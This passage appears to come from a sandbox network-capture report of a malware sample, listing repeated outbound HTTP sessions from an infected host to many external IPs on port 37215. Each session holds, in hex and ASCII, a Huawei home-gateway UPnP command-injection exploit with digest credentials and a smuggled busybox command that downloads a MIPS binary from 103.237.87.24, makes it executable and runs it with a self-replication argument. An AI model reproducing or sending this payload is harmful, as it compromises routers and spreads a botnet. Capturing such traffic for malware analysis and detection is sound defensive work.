2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1653192.168.2.1335152155.128.129.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.513484955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1654192.168.2.1352342146.17.222.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.513545990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1655192.168.2.135142441.177.129.23437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.513612032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1656192.168.2.134860231.20.4.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.516468048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1657192.168.2.1345664116.108.225.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.516469002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1658192.168.2.1341318143.244.249.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.516488075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1659192.168.2.1350694162.66.114.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.516488075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1660192.168.2.1346946197.137.208.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.516546011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1661192.168.2.1337422157.54.87.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.516555071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1662192.168.2.135520841.233.151.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.516608953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1663192.168.2.1354692157.159.28.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.516616106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
